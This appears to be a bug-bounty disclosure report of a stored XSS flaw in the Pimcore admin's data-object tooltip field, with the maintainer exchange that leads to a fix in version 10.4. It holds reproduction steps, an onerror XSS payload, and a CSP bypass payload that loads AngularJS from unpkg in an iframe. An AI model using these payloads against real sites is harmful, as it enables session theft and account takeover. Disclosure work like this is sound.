Stored XSS in Tooltip in pimcore/pimcore

Valid

Reported on

Mar 23rd 2022

Description

The Classes in Data Objects have the Tooltip field. It is vulnerable to XSS attack.

Proof of Concept

STEP1: login https://demo.pimcore.fun/admin/ STEP2: Settings->Data Objects->Classes. Then choose an item, like product Data->AccessoryPart (AP)->compatibleTo。 STEP3: add payload in tooltip field. <img src onerror=alert(1)> .then save. alt text STEP4: Open a AccessoryPart type Data Objects, and move the cursor on the Compatible To filed to trigger the event. alt text

all the item contains tooltip field is vulnerable to the attack.

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the pimcore team within 24 hours. a year ago
We have contacted a member of the pimcore team and are waiting to hear back a year ago
We have sent a follow up to the pimcore team. We will try again in 7 days. a year ago
pimcore/pimcore maintainer has acknowledged this report a year ago
Divesh Pahuja
a year ago

Maintainer

@mylong Hi, Pimcore comes with generic XSS protection handler, which is implemented on https://10.x-dev.pimcore.fun/admin. please try to reproduce the problem on master demo instance.

mylong
a year ago

Researcher

seems the csp works. since unpkg is in the whitelist. I can temporary use the following way to bypass the csp. STEP1: image-20220405175545330 STEP2: image-20220405175637005 POC: <Iframe SrcDoc="<Script Src=https://unpkg.com/angular@1.6.0/angular.min.js></Script><K Ng-App>{{$new.constructor('alert(1)')()}}">

Divesh Pahuja validated this vulnerability a year ago
mylong has been awarded the disclosure bounty
The fix bounty is now up for grabs
Divesh Pahuja marked this as fixed in 10.4 with commit 8c39a8 a year ago
Divesh Pahuja has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation